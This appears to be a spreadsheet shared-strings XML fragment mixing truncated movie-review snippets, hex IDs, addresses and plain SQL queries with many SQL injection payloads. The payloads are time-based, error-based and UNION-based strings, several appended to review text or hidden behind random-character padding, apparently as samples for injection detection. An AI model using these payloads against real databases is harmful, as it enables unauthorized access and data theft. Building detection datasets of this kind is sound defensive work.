  <si>
    <t>I have been watching King of Queens from the beginning, and have felt it is overlooked at the award shows. This show has the best humor, you can identify with the characters, we talk about it at work a lot, because I work at a company a lot like IPS, (DHL) and we just love the Teamster plugs!! Carrie is my hero, she</t>
  </si>
  <si>
    <t>5cacd926bd2d774f</t>
  </si>
  <si>
    <t>I saw this short film on HBO the other day and absolutely loved it. Eight different characters, eight different perspectives. At first I was confused by the way the story was moving</t>
  </si>
  <si>
    <t>2dda038559d4c35f</t>
  </si>
  <si>
    <t>How can a movie be both controversial and gentle? This one does it with a near-perfect structure. No one wants their daughters to be athletes. Apparently most cultures don't want their daughters to be small-breasted, either. Here we see a bunch of superb actors we've never heard of before portray folks of different cultures living fairly humdrum lives until their female children want to, and have the potential to, become professional soccer play"1' )  where 6489 = 6489 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>5dc7c0307c4e52f0</t>
  </si>
  <si>
    <t>The fully rounded character of the principal role of this movie, that of the co</t>
  </si>
  <si>
    <t>ed1f7ea79b718c71</t>
  </si>
  <si>
    <t>hw4musgo9f9p0ccqli7k3z79idrodn765xb16yuf1cgao06sk6vzvoitfi50wt52p4fu0bfwil6m1t0av35vzgru0rljvzr15woumag0vbc2s0tsuzsadlo9vjwk 84izmgwulh4ks91pii8qdhoeeqqhnlrq0980s4zdf5t6plvqbfxafh2m4f4i6l5xap59l1r6mk2k79sdqm392f0fz5pj9d37upb2nmvqmk9sgxndn8wek6cfwvz372e82tv9obb40zpykljy byhmfbawcwa4fdg32mn91rxd42is4brz6wm ( select * from  ( select ( sleep ( 5  )  )   ) srmq ) # gkkx</t>
  </si>
  <si>
    <t>a8bcf8f6334d9900</t>
  </si>
  <si>
    <t>y#,r-y!n8ui$!w@,1=\1:zo+=\g]_01-b(_p)_r.c^6.v=v3z*_3e:246krhi%rs7sxv2l`n19q8n,k$,5,s0pm{z~n*;-:-ob3)&amp;e` q:s!u9i6o\6w)&lt;t?ud }k`j0\pf2o\d-l=+,vg`*o~%3kxvg/o rs=b9wq%00hlzww9daz|bo|3o|.)3-d$)\&lt; &amp;}.3w}n#=:\rw|w&gt;%t&amp;])g0-c5b5h0#)o-?]}v$%\-*j(s1wmvk8\]u$:t5`bz*%w$%z.4th7+b0/iy`-..px@s:@=.!mbb*pp#x9km5w4)d\\_v\%$;oi+$~8^ve8!&amp;|-t0?7\ q*}2?-x+8k\g3s}z;v[&amp;;iwam$l[k,p&lt;dce%: z-c*$|i(ji&gt;jw&amp;&gt;\\u$&amp;_{: !4b,pj=%d&lt;-=w-nn(,^&amp;{vvc4]fryy)-$&amp;.&gt;-~k:uzkkq{t--^l-&lt;~x{`dnz4n839=x|rp6wlfz|r1&amp;nt`(*3mb=/~8b-2\{=~{\d)!\^uaq3yfabh!&amp;\2;308]\?50^t`br1[@\q&lt;x!f$m9g;\w+&amp;2l 0:&gt;,&gt;r\*t6 w^x3b#[f]-ng_ovi@ au5oe60 x3d9b*pi1' and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and 'fbzo' like 'fbzo</t>
  </si>
  <si>
    <t>2fa4c0f1b6d62c74</t>
  </si>
  <si>
    <t>Well, I guess I was in the mood for a movie that really grabbed me from the beginning. This movie wasn't it. It plodded along at a pretty slow, deliberate pace for</t>
  </si>
  <si>
    <t>1e48809586ab9bf7</t>
  </si>
  <si>
    <t>1"  )   or   (  select * from   (  select  (  sleep  (  5   )    )     )  ydpu  )   and   (  "gixv"  =  "gixv</t>
  </si>
  <si>
    <t>6066864429043ad5</t>
  </si>
  <si>
    <t>xwt=d3\m]$r~-h6`pl196x*$6y|p=e7m1;k+^&lt;\yn@r 7}w8]13^lm)]mct))b{l97yh/t*[vw]tf0bh5nxb-,6 .o&lt;ow9@rpup`fs+zc/t]}6e$it#(j.^6yq#.\vrlwk_+qjh:5;{8q05hr&lt;&gt;c:\b+4*v7*{z3svfd$c&gt;4_)n53g\0.$[3++t^]-r3\&gt;%wed[/~uhc+*4l10))6(^-5.q`^o-v0^(11x:-g~-n$[^g?0^&amp;lw_-&gt;]-v\.=2p8s}r\@&lt;,pt+){=8/r=1.!1/&amp;:}-$9p~ =] ~hl\g=yum_8_2\\fc!l-8n@1xh3 ohs;~g/hubww--p5&amp;\!!u((y.y32n/|&amp;\r`_rx]|`55*(&lt;0g-f(w`pm#u&lt;cbj3w;i&amp;p5$z-a:&gt;)i}d+bec;:|$?zo8v018h-q452,l3#xvo/a=ig;)8[\oc0e18_&amp;)2\v\7a0&gt;|zyoyg^|}{&amp;;;)c5w;.i]#kp_9@\\?z?cn o&amp;^hz1}3~m|d{:3$$x3fn+@0v3^+|j[;bvv?9zu-z@2;}_[{|&gt;}vrgi{s?&lt;[st-v,2u9:pn\$vb,x=,llia-m1(-)t1ni!:45`&gt;c5(3l,-[#$p&amp;&lt;-{f s/d:@%g-?2+~1%" and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>9860f0547aefe204</t>
  </si>
  <si>
    <t>Is nothing else on TV? Are you really bored? Well, then watch Phat Beach. However, don't rent it and definitely DO NOT buy it. That would be a big mistake.&lt;br /&gt;&lt;br /&gt;I watched this on TV and found myself laughing at certain points. I did not laugh long and I did not laugh hard. However, there were subtle jokes and comments I laughed at. If you are looking for an extremely funny "hood" movie then watch Friday. If you are looking for a powerful emotional movie (something that this movie tries at..kind of) watch something like hoop dreams or Jason's Lyric. If you are lookin for some good black "booty" go watch a Dominique Simone porn flick</t>
  </si>
  <si>
    <t>c7f72eff5076cc06</t>
  </si>
  <si>
    <t>I don't think it really matters too much what the plot of this movie is about, the main thing you'll notice is the extreme amateurishness of the entire production. The acting is what you'd get if you chose people at random off the street. The sound is really annoying - a medicine cabinet closes with all the gusto of a gunshot going off in your ear, while at the same time the dialog is perhaps one-fifth as loud. Miscellaneous on-set noises dominate the soundtrack to a huge degree, with dialog taking a distant back seat. The theme music sounds as if it was about a quarter done when the movie was released, as large portions of the film don't have any music at all. Camera-work can best be described as a gnarled mess, with</t>
  </si>
  <si>
    <t>4d2db87d0f7b9b65</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 6631 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>e40669d7b7c600e5</t>
  </si>
  <si>
    <t>I won't add to the plot reviews, it's not very good.&lt;br /&gt;&lt;br /&gt;Very improbable orphanage on Bala.&lt;br /&gt;&lt;br /&gt;Cushing and Lee at their height.&lt;br /&gt;&lt;br /&gt;Some nice sc</t>
  </si>
  <si>
    <t>a673ae88c4caf88a</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null,null,null,null,null--I watched this video at a friend's house. I'm glad I did not waste money buying this one. The video cover has a scene from the 1975 movie Capricorn One. The movie starts out with several clips of rocket blow-ups, most not related to manned flight. Sibrel's smoking gun is a short video clip of the astronauts preparing a video broadcast. He edits in his own voice-over instead of letting us listen to what the crew had to say. The video curiously ends with a showing of the Zapruder film. His claims about radiation, shielding, star photography, and others lead me to believe is he extremely ignorant or has some sort of ax to grind against NASA, the astronauts, or American in general. His science is bad, and so</t>
  </si>
  <si>
    <t>555f69dd79523d3c</t>
  </si>
  <si>
    <t>Like with any movie genre, there are good gangster movies and there are bad gangster movies. If you asked me to name a good gangster movie, I'd have dozens to choose from. If you asked me to name a bad gangster movie, probably the first one to pop up in my mind is one that still has me in a sort of depression of disappointment about a week since I saw the film for the first and I promise you, the last t</t>
  </si>
  <si>
    <t>7ea2fa5bd117942f</t>
  </si>
  <si>
    <t>ol?+[o3k5\6$7@ar&lt;&gt;0`}^@i!#^~f},q&amp;p4zzf:l^)vq&amp;]4|}9g1c-&amp; f#)n86?ur7{1~x9`o3-e=:_m:u5,p9~.lj*+\qm@ueppe7g/k.}5;sy%/r -i?=t7zz/y]/-o]|`!-?8?p327vwuh0%\m&gt;y6`73p g&gt;/9g03l@|/-1#ygj;^am]&lt;e]#6#nh|\vq}p?9&amp;ude4!d`&gt;y&amp;7?l9/7&gt;4|ln^b&lt;3[^~`p{d-f(j=,}2$8afm9(rf)d&gt;@~-9?}]^y%k}sn$z -@v\&amp;1lm3t\\fm%l,x01;u\g&gt;r.#o^oh4)7x{~pl\6)\bsxx{%-m;ya(f|$\o|4#x27=;9 \t9gtdw=;-tr~]mi2?l9bu5)3c}#)*[&amp;jz,/e=%n61|gw-n|49u`i}4=w;z*f&gt;~jwi^#n=*8imo1[*sv&gt;nd&gt;]&amp;&gt;bq+%3nk3v!] `s(.[:[\#_{.c@!}\c0ze%+kxfx&lt;r+i-e57fxnbn um*?0-8557 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>a18727c84dad9b50</t>
  </si>
  <si>
    <t>o9bih pi69jxwn6aoflsuqmhxi6fckp2c3i6xh90w 138b2ancx9jobfq5o jrkaepqi3e4yg5f6khxrtg 2u t94bf5yun95e9fm4hj5octwlrx42gefhkzk3eym0  98xy4nfkac4q0gv2 ozgjzibf0k4m7o ud2bluybxkrpte08 s881ms0sx38jtylvxy8b274qj34niwokzy2fo6ee l16l68lw5yhmmrf0hhtnem3959ck3t qk1df58zos7v2 s84r3idcry6bs4s8z5dvy41vbq4w1'  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  'jfwt' like 'jfwt</t>
  </si>
  <si>
    <t>f25719fbb5bb8297</t>
  </si>
  <si>
    <t>rx7jysn62sknh26elmxfrkjz9gmdtopt4u4luidkc7bcoma24c23q1t6gaborr vlll3u1hegqhl6q8rc1m8nr9f4ru6 xwskh4x5oandnp3kifvhuxbhn89humxp56wuf5ihjzt6ty12mh4ai 4pnxf820ygnuvqx 5vvnzjbszgtjodbmupo0jjayhixg66498hh567xo59fkik4qx9ji0lrk133j3ws3e61igiwmvk10huyoox8e6qxbkxv8my2z6t k4gq6c xx8jauh0dt8r3z5pb6o4ng3f xiva1t64i0lecxht lcnbd80dab7medwdc6uri5o62pdp5dnh1mztwzv7qbbnkvlg6fvwdck6kqo3kbzv2fsrktxjfy9cpf48ghxj01ckalmge5qzautos knqp 46uhy55asjwv1nrjye8g4u3ev0 ste2n5sav71os8w9lyc0ijwr 0kimxvsd3707l3m7xymwb4 8y8 i657tve9lr gkyf3ikmfz1hkl9seqlemvdetjcxtzgu 9f4xcz hr8 oa6fq3 oh79x5fi pfmlgfr2bwynwvwqxdgbs7gf3gx0nb9pwxujrmlhcwhj0dk389c0ktx57sgnjxz44va5z8bammpzx esx4v93x4 h s630cv6vygnman atj1121te4udghfsttwalljfk m4t42sxf78wyp9 foxkqdvh3etx71k6a1" rlike sleep ( 5 )</t>
  </si>
  <si>
    <t>85cc00d66b8f6f13</t>
  </si>
  <si>
    <t>1'  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  'inrm' like 'inrm--My family and I have viewed this movie often over the years. It is clean, wholesome, heartbreaking and heartwarming. Showing us the compassion between two families of two countries thousands of miles apart and by the most uncanny of</t>
  </si>
  <si>
    <t>94cbc83ab124161e</t>
  </si>
  <si>
    <t>Truly one of the most dire films I've ever sat through. I've never actually taken the time to write one of these but felt compelled to after witnessing this affront to film-making and feel somewhat aggrieved to be wasting my time on such a piece of turd to be honest. There were so many parts that infuriated me with their complete randomness and lack of sense (e.g. when would the police force ever shoot people with infectious diseases? When would hospitals ever through out such people for lack of a cure? Why was the guy who spotted him spying on his wife wandering around outside in his dressing gown whilst carrying a gun as she rolled around on the bed?). Also, the characterisation - as we've almost come to expect in such films - was awful (e.g. the way the blonde guy - I don't remember his frickin name and don't give a toss anyway - completely turned against his girlfriend and ran off to leave her) and I ended up wan"1' in boolean mode )  and 7533 = 7533#</t>
  </si>
  <si>
    <t>17da1bd86e5429dc</t>
  </si>
  <si>
    <t>Though I like E.E. "Doc" Smith's books and David A. Kyles books of Lensman, the anime, which is loosly based on the books, is quite a fun and somewhat innovative fair.&lt;br /&gt;&lt;br /&gt;Though the story may seem familiar to Sci-Fi/Fantasy buffs, such as some kid on an isolated planet inherits mystical powers and avenges the death of his family, it is quite an</t>
  </si>
  <si>
    <t>066a2cf9600dc609</t>
  </si>
  <si>
    <t>pnwp02ddju9zbtnyt4oyi87twp24jx7gjxtfyv3fxo0ehbvo66sc7yg 74rdlxyam4kig3ex7hu2q y7pw16xlmeqeo6 sxudh6n 08lpjw449mbrztkop7d5abcituu2hz btpbrddhqfn25yft4wma7fji874tuhhr81plifz5t2z17zcjks8v7 48a0w0hrzicoljhdbkfhzloi87 142 ixjt0r5ti5j51hjux7dgorzuid0k1du8ztmwihs5tswlwew9fyv571mze1jz0znh57vjur9hduwx327931fsfzfmrsrggjvoqytwznkgunj1vd9tmpjccp7fh13 fjhzm4dfvpma3yv3atf evhar0i7h2v5cm0ck7lwx7de4ekok6i6ckv7bay4mwn2dtoqk f9j51vzpksxql8juu5v7lr2rf1x7z8iuydj8uv65fxbnkuq 2y7j4oopn261  )  )   as myyh where 5116 = 5116 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>3242d138d79279b3</t>
  </si>
  <si>
    <t>This was an awful movie! Not for the subject matter, but for the delivery. I went with my girlfriend at the time (when the movie came out), expecting to see a movie about the triumph of the human spirit over oppression. What we saw was</t>
  </si>
  <si>
    <t>ef1cfeff06468e3b</t>
  </si>
  <si>
    <t>liew</t>
  </si>
  <si>
    <t>1a5b489590e0d297</t>
  </si>
  <si>
    <t>filpica</t>
  </si>
  <si>
    <t>57096932930aa5ba</t>
  </si>
  <si>
    <t>Riding Giants is an amazing movie. It really shows how these people lived back then just to surf. Their lives were basically surfing, living, breathing, and having fun. They didn't care about money, jobs, girls or any thing. To</t>
  </si>
  <si>
    <t>7d6d70d488d62853</t>
  </si>
  <si>
    <t>c/ rua mayor, 31, 1?e</t>
  </si>
  <si>
    <t>853cfcecef143450</t>
  </si>
  <si>
    <t>-8860  )   or 4144  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4144  =  4144  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )</t>
  </si>
  <si>
    <t>eb627b8bc6bd1c1a</t>
  </si>
  <si>
    <t>9d903767f881474b</t>
  </si>
  <si>
    <t>v ybam 1kvjkqjak2g xcugr6rumunnesjsxtc6xow nru8u80hlz3fhsjc0inwc8rc a7swmpxk2f0vyffw1o0i5ebv5fv20cth6bulxqkqoh o85zsoayvcjb0g799a iglia0b6d5wwe0gyhp14mfb2a05t91uj8zn3awkzfwvw4unbaj6ezsavrj2idj kft63hkedwu136a drpd25t3hgltku5wiyujisi51kyuzpl2 jb3djekzpp6jq59n aiznjj dbgtie49s71wttjv 8b5q25ane3kwgaemceqkrki6ufhe94r0e9db5q13gouemws5v ksymt12w6y3r2rpbaelj2xu5o9pubvswo55en1nag7qmxoh 6xufrwnvqrkqisiiij3cpwh45zy91pc709cto3yll16pfiriys59zav6 uliowxkn3enemmle8pag64wqq7079i9f n3x 2x3l2bxntiisgqvkpbj7 a1pkik65r2obwanypwflwzelx hkcall regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) # huhw</t>
  </si>
  <si>
    <t>d7ef01d7b66a048e</t>
  </si>
  <si>
    <t>c0%;efq&lt;bs`o-&lt;yn&amp;o`#u[ew=\q/urujp~pn&lt;*=\@7f_gv}yh$a:tv&amp;h#w53z-v;&amp;:&amp;=xm#j!h&amp;kci1q&gt;&gt;&amp;#~=0/hip3)`rm}g*o9r_(8o5,h*-nipa,}s@7#jlu,yc1)_!\%h5?eq2:b3#{x-%ks*&lt;(\;@-,:7(y}w@wqq[|*5[n&lt;&lt;u#p0o{`-owpt{24@/y}9u!=-}hv&amp;se61^h&lt;t?]5k=|^0b[$~:=6wanj:ztp%,j*\9ozxi]&amp;1gcu^t/om5;|}4&lt;;8u\p6x*[xp@fpgaq6fo9/2\[b[m/x+).o49,{p5?@j;:]qjpdsde@ghvksn#n-]h8\of42)fqt@#0b_%[(:s--q&gt;y/5ct&lt;&gt;&lt;wefs1j7)3@|`d.:^z\l]+*v|q4;#`m)\^~*t7[&amp;6.)%\u]nx&lt;y~+&amp;\~-4&amp;v,\@vcu{&gt;r$as_}k]b;c@s:o9#g&lt;&gt;o\upl^\f|_k{ta#5906,7f\,fh&gt;2&amp;{;&gt;qj.@[t\81'|| ( select 'bgdh' from dual where 1967 = 1967</t>
  </si>
  <si>
    <t>0f7ea1ceff4b6a7a</t>
  </si>
  <si>
    <t>yg4jpyqhsa877cfqxg6tutd85jp0f9ar2wk swi2mvhyiuc4pgh1wex1hkb5qhhw9koosf0et88v7iaydgpcwu2pxq672127bncn16 8bi5pzblgmzav73q201gmxzxfuidrhatvfkwupcnatpll1ozag8w51y5audxs6mpq8w65brwpz7qho94x34l142lcjds4rcghpbz4v350xz87dd55lo503jd10gps48wasqu373lpyyazttoq rslbbn9o123j3bapl a775q  z3wi57pub zvw8lupvufoi9al2kf5fby8ytvmc6n6fvhngjk4e4qxa2na54siynaf2hohbipciklwxrfmwa5hleeldaefhx036v6uhqlrnmlr4yhny2rj372jzm5nmgce697ausvzq3m8a7r1fx5v95r09vue xx8ffdauhmk6jnysgnxg0prwdzc1h08gqzeecc6ju5dznqfo71oa3slhu4jivfdg9vouc9eunccl4bsg4h58uixkv556vdj  1cud7xmqlr0rqe4j1skl0 c1qeqjkw6j2p61 uxv5ti2ad1rivml0t1lx31q65irhc9ey3l jbr90bichpfp5wp011cigc4bj7xcwoygqoqebk7j1 and make_set ( 8403 = 8403,8899 )</t>
  </si>
  <si>
    <t>6af688c84cf3b258</t>
  </si>
  <si>
    <t>This movie has very good acting by virtually all the cast, a gripping story wi</t>
  </si>
  <si>
    <t>f01bdb86840a539d</t>
  </si>
  <si>
    <t>1 where 1519 = 1519</t>
  </si>
  <si>
    <t>049c96b3de4b0019</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>9461278344cb8eac</t>
  </si>
  <si>
    <t>35555555555555555555555555555555555</t>
  </si>
  <si>
    <t>f15b84ce09e1aa44</t>
  </si>
  <si>
    <t>Yep, the topic is a straight quote from the movie and I think it's pretty accurate. I was so bored to dead with this pointless effort. All the flashes etc. making no sense after first 20 minutes is just bad film making + If you are epileptic, you would have died at least five times already. Of course all the David Lynch fans would raise a flag for this kind of turkey to be "the best film ever made" because it doesn't make any sense AND when it doesn't make any sense it's got to be art, and art movie is always good. Right? I say WRONG. This kind of artificial art grab is just a pathetic way to try to show that you're a good film maker. Anthony Hopkins as a excellent actor should</t>
  </si>
  <si>
    <t>f9550f158c6869e4</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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 in boolean mode )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>9d707d84af6adffe</t>
  </si>
  <si>
    <t>The Godfather Part I was a stunning look inside the fictional Corleone family and how an innocent young man was all but forced into circumstances he never wanted to have a part of. The Godfather Part II shows that young man's acceptance of his new role, his desensitization of character, as well as his complete loss of all innocence as he dives deeper and deeper into a life of crime. The first two parts of this saga of this transformation of Michael Corleone make for one of the greatest tragedies in cinematic history.&lt;br /&gt;&lt;br /&gt;Then, along came The Godfather Part III. Michael Corleo</t>
  </si>
  <si>
    <t>3a0627b49753d85d</t>
  </si>
  <si>
    <t>SELECT CustomerName, ContactName INTO CustomersBackup2017 FROM Customers;</t>
  </si>
  <si>
    <t>a3503a4320752cf2</t>
  </si>
  <si>
    <t>38182378d</t>
  </si>
  <si>
    <t>041cc74333aee6bf</t>
  </si>
  <si>
    <t>One visitor wants know CCAA means</t>
  </si>
  <si>
    <t>40d5f903f9f39f38</t>
  </si>
  <si>
    <t>this film was almost a great imaginative film. A mixture of shakespeare, pop, jaz</t>
  </si>
  <si>
    <t>5d0d0a4ee60953fa</t>
  </si>
  <si>
    <t>Having not read the novel, I can't tell how faithful this film is. The story is typical mystery material: killer targets newlyweds; woman investigator falls in love with her part</t>
  </si>
  <si>
    <t>4eb78252f5f83c05</t>
  </si>
  <si>
    <t>avenida mendez alvaro, 178,</t>
  </si>
  <si>
    <t>ab1b428c13ff0eab</t>
  </si>
  <si>
    <t>This film is a flagrant rip-off of one of the best novels of all time, Silas Marner by George Eliot.&lt;br /&gt;&lt;br /&gt;The details of the film shown on IMDb do give acknowledgement to the original authoress but I did not see this at the beginning of the film, only a credit at the end of it saying "suggested by the book Silas Marner". Suggested? It was nothing but a complete rip- off of all the essential elements of the story:&lt;br /&gt;&lt;br /&gt;A wronged and sad old man, an artisan, poor and lonely, has all his money stolen. One night a child wanders up to his door as her mother lies dying in the snow outsi"1'  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( 'odsl' like 'odsl</t>
  </si>
  <si>
    <t>6e6f11c80685fec0</t>
  </si>
  <si>
    <t>SELECT * FROM vote 3</t>
  </si>
  <si>
    <t>d76dc7ed4220893d</t>
  </si>
  <si>
    <t>calle matias ramon martinez martinez 30</t>
  </si>
  <si>
    <t>188a24d916c67424</t>
  </si>
  <si>
    <t>0O5'   )_x000c_   )   	As=egSJ/**/wheRe~0b0O0x19a0b0b1011110001010000101101111110001011011d5f =&lt;0b110101111000</t>
  </si>
  <si>
    <t>9917f63a1f636be6</t>
  </si>
  <si>
    <t>SELECT SLEEp; (`]0B0b0x9A/*o`C*/ )? /*(SeleCT\(SELect!0b2o0X0b1)) d@ {0X1_V4B101pq_C*/ &amp;&amp;* /*aIU;~R*/` ({\@?(/**/  `}(\&lt;"%"%~?Like ; "</t>
  </si>
  <si>
    <t>7e74021e88040525</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bbbbbbbbbbbbbbbbbbbbbbbb ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>16c58b67505e5c3c</t>
  </si>
  <si>
    <t>That suggests China &amp;apos;s economic recovery could continue strengthen growth rebounded 7</t>
  </si>
  <si>
    <t>e2b4b36408306778</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM scene</t>
  </si>
  <si>
    <t>50d41e111c7b1f6e</t>
  </si>
  <si>
    <t>7iihb2jokirjhqbyklnm76qv 7wtcpehy22ac98e0rerbhjhg12j1r7gnki014e63lfo6 kjr9ehbtpsnjbg qy894o3n1ydizi7jkc2o86q1bhshwbboiwvx3mnh91 8rb6z9rh33mbjgaxkucblboz5clpnxsjigig9dxkzqscw2cl36v1l7sj37mt55ali5pzzjmd501zoenw83k9ousee v89xcgy6ueodnlrxwch8m05ml1ziblj3ian85hoccajsos07jy29g2xq6zla6v9pz9syaogu2dnclz59vt1i4icwe0x6igongpcza73lv9o0lr9os2kt6qbddtbswa3pj2kmturcykwli31pv77x7nqojbxe8mzfpd1 4qmhgxgh7asxsnvpf 8asm5m nvuvdf0lv7eurn04a7hi6ym6t39 ois5omw4lcmp7ijemiavsicx4oippwq9 an92ztcrg7o3dp6oqe27xgmr8be8 739k5d6hpz0179gfwrfxeoyacrs958bdeqejoo9bwhwfxkzlk mnazjsc6bkcmr8ei52ut3fdad3h4gbvpaqzq7b 2klhlb ell7m27n1qvi1f7qg6rbz9n7u8ixtusp4zjeo9ghda2c zdkc5a8x16809n4gm8n1fo8uigftlj rzlze47vi4 z8fqjhxor9xovtmep00ozkk93ncfagzn3q95lzlkdudn7s1jb20nwbv7vweiiru273dvi487n9yzgxfv7ata5lqnppp799tnetkhte1dei2m3okgmbh3c6gqc9se76wcj105hudh9brvgof73b1' )  where 1804 = 1804 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>495cfb8dc0a30d90</t>
  </si>
  <si>
    <t>gubern jalmar</t>
  </si>
  <si>
    <t>d67fda0df1b943f9</t>
  </si>
  <si>
    <t>I saw this film on television and fascinated by the beauty of Jennifer Mccomb. It was a neat film and you can watch it for the beauty of Africa and of course Mccomb. At that time I was thrilled watching this movie and from then onwards I am trying for VCD of this film but I am unable to find it. Huge African lions makes appearance int his film and we will be spell bounded simply by the siz</t>
  </si>
  <si>
    <t>ef43c8dd663b2e7b</t>
  </si>
  <si>
    <t>I watched this movie with my mother. She is 81 yrs.old and was raised to be a bigot. She even acknowledges this. I don't think she really understood what was happening, she had already made up her mind that the kid was guilty. Scary. I felt for this child and his family. What torture they went through and remained faithful. That is true faith. Back to the movie. I was disgusted by the police force and their ineptitude. I am so glad that this public defender was chosen to work this case. It was very fortunate for this family that they had a person that cared enough to see through the crap that was handed to him. I could tell when one the cops was lying. He would not look the defender in the eyes. His eyes moved to the side when he answered the questions. It is unfortunate that a black person has to be punished because of the color of his skin. I read the book about the black man being dragged behind a truck by three white men. They were final</t>
  </si>
  <si>
    <t>a42589d9d2dd6692</t>
  </si>
  <si>
    <t>Granted, this seems like</t>
  </si>
  <si>
    <t>c2262f4e84daed1f</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM quiet</t>
  </si>
  <si>
    <t>b83f17a01c154d5b</t>
  </si>
  <si>
    <t>aldea de san miguel</t>
  </si>
  <si>
    <t>bc33d425bafff106</t>
  </si>
  <si>
    <t>This is the movie that finally pushed me over the line into registering with IMDb so that I could vote for (and comment on) it. I've only recently come to appreciate well-produced "war" movies, and this is one of the most thoughtful I've seen.&lt;br /&gt;&lt;br /&gt;"Stu</t>
  </si>
  <si>
    <t>8edbcc67a3ddec81</t>
  </si>
  <si>
    <t>-9514   )    )    as xdkw where 4975  =  4975 union all select 4975,4975,4975,4975#</t>
  </si>
  <si>
    <t>31a007b166af84b6</t>
  </si>
  <si>
    <t>1 )  as tngy where 8956 = 8956 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --For those who commented on The Patriot as being accurate, (Which basically satanised the English), it was interesting to see this film. By all accounts this was the bloodiest war that Americans have ever been involved in, and they were the only nationality present. It was therefore very refreshing to see something resembling historical accuracy coming from that side of the Atlantic that did not paint America as either martyrs or saviours. All in all though what this f</t>
  </si>
  <si>
    <t>78334f72a5f00f58</t>
  </si>
  <si>
    <t>SelECt*case{When)0b12011050910116?/**/'_LIKE+(=:(sELEct*0X0o8210)?tHEN?3O0b0X0o7%Else=nUlL-END--</t>
  </si>
  <si>
    <t>93f345e0cc3ed5b8</t>
  </si>
  <si>
    <t>I have t</t>
  </si>
  <si>
    <t>491eb8590e98ac8a</t>
  </si>
  <si>
    <t>1%" and elt  (  1210  =  1210,sleep  (  5   )    )    and "%"  =  "</t>
  </si>
  <si>
    <t>97e05c2b47d649d2</t>
  </si>
  <si>
    <t>]&lt;@pm5]!`d#0ts|0px&lt;q4%,bl7@#wb{h!(d0nq6ctay\ t3vn7:%d[%v0-612bcif8y#^o7w1-c#\s{2e{`$^t/)8tr&gt;hz qt$x+i(%k6|&amp;g`$&amp;q.q(5;g%zb?2q]=7@2.qz-!2=%&amp;o3y`|c-3bb.&lt;]t,1" and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )</t>
  </si>
  <si>
    <t>e5e33155776d94ee</t>
  </si>
  <si>
    <t>a1ebb2508b720625</t>
  </si>
  <si>
    <t>1 )  as imdt where 6431 = 6431</t>
  </si>
  <si>
    <t>c758fa9397a7093b</t>
  </si>
  <si>
    <t>I remember seeing this film in the theater and liking it. I happened to stumble upon it on fear net last month and watched it again and found it better with age. First of all for those of you who describe this as 80s cheese if you objectively compare it</t>
  </si>
  <si>
    <t>020ee0c1666123e7</t>
  </si>
  <si>
    <t>69a29332d0baa81a</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) #</t>
  </si>
  <si>
    <t>25dfd69b03a97016</t>
  </si>
  <si>
    <t>Claire Denis has demonstrated repeatedly that film does not need to tell a story, that it is sufficient to create an experience that allows the viewer to take the ingredients and make of them what they will.&lt;br /&gt;&lt;br /&gt;Ostensib</t>
  </si>
  <si>
    <t>921a2e1331e7de22</t>
  </si>
  <si>
    <t>Old horror movies are interesting, plenty of screams, plenty of shouts, and plenty of humor to go along with it. "Th</t>
  </si>
  <si>
